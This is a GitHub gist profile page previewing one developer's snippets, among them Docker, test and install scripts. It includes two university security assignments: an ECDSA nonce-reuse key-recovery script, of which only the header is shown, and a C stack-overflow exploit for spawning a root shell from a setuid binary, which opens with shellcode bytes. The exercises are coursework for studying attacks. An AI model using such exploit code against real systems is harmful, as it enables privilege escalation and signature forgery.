Skip to content

Instantly share code, notes, and snippets.

View bountin's full-sized avatar

Martin Prebio bountin

View GitHub Profile
@bountin
bountin / manual.md
Last active March 14, 2022 15:20
Pre-Building Oracle Docker Image for Testcontainers

Pre-Building Oracle Docker Image for Testcontainers

This description is based on Oracle's guide to prebuild images in combination with Oracle's guide build Oracle Database.

If one builds an Oracle Database image according to the main guide, the container will take minutes to boot due to database initialization. By baking an own image that has the initialized database incorporated, the startup time reduces drastically to roughly 10 to 20 seconds.

@bountin
bountin / FooTest.java
Last active April 4, 2018 13:20
Zohhak Issue
import com.googlecode.zohhak.api.TestWith;
import com.googlecode.zohhak.api.runners.ZohhakRunner;
import org.junit.Test;
import org.junit.runner.RunWith;
import static org.assertj.core.api.Assertions.*;
@RunWith(ZohhakRunner.class)
public class FooTest {
Algebra und Diskrete Mathematik für Informatik und Wirtschaftsinformatik (VO) & Analysis für Informatik und Wirtschaftsinformatik (VO)
> Mathematik
Statistik (UE) & Datenanalyse (VU)
> Statistik
Wissenschaftliches Arbeiten
> Grundlagen wissenschaftlichen Arbeitens
SEPM & Objektorientierte Modellierung
@bountin
bountin / 00-pgsql_install.sh
Created January 26, 2015 21:11
Puphpet test script for installing pgsql.so
#!/bin/bash
# Copy to puphpet/files/exec-always/
EXTENSION_CONFIG=`grep pgsql.so /etc/hhvm/php.ini`
PHP_INI="/etc/hhvm/php.ini"
if [ -z "$EXTENSION_CONFIG" ]
then
echo "Installing hhvm-pgsql.so"

Keybase proof

I hereby claim:

  • I am bountin on github.
  • I am bountin (https://keybase.io/bountin) on keybase.
  • I have a public key whose fingerprint is 5BB1 5335 2814 8CF6 24BE 93BC 330C 5D2E 29CA 27E4

To claim this, I am signing this object:

@bountin
bountin / inetsec5.py
Last active August 29, 2015 14:02
Attacking ECDSA with two messages in a PCAP file which have the same k - This also implements a client to test the found private key (University assignment of Internet Security 1 in the summer term of 2014)
import socket
import ecdsa
import base64
import sys
from hashlib import sha1
from ecdsa.util import string_to_number
# Fixing fucking scapy warnings - fuck python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
@bountin
bountin / attack.c
Created May 24, 2014 12:57
Using a stack overflow to spawn a root shell off a setuid executable - University assignment of Internet Security 1 in the summer term of 2014
#include <stdio.h> // printf
#include <stdlib.h> // malloc
#include <string.h> // strlen strncpy
#include <unistd.h> //execl
char nop = '\220';
char *shellcode =
// setregid(-1, 201)
"\x29\xc0" // subl %eax, %eax
@bountin
bountin / testrunner.sh
Created November 18, 2013 11:14
A test runner script for the assignment of the lecture "Introduction to knowledge based systems" in the winter term 2013
#!/bin/bash
BIN='./dlv.i386-apple-darwin-iodbc'
OPTS='-N=75 component_tester.dl -filter=UNCOMPUTED_c,UNCOMPUTED_p,UNEXPECTED_c,UNEXPECTED_p,DUPLICATED_c,DUPLICATED_p'
for CLASS in g b s;
do
echo "----- Test class $CLASS ----"
for TEST in $CLASS.test* ;
do
test: all
gcc -std=c99 test.c asma.o -o test
./test
@bountin
bountin / wp-filebase-email-required.patch
Created November 25, 2011 17:12
Patch for WP-Filebase to require a form submission before downloading
diff -Narub wp-filebase/ajax.php wp-filebase-updated/ajax.php
--- wp-filebase/ajax.php 1970-01-01 01:00:00.000000000 +0100
+++ wp-filebase-updated/ajax.php 2011-07-13 10:24:01.000000000 +0200
@@ -0,0 +1,35 @@
+<?php
+/**
+ * WordPress AJAX Process Execution.
+ *
+ * @package WordPress
+ * @subpackage Administration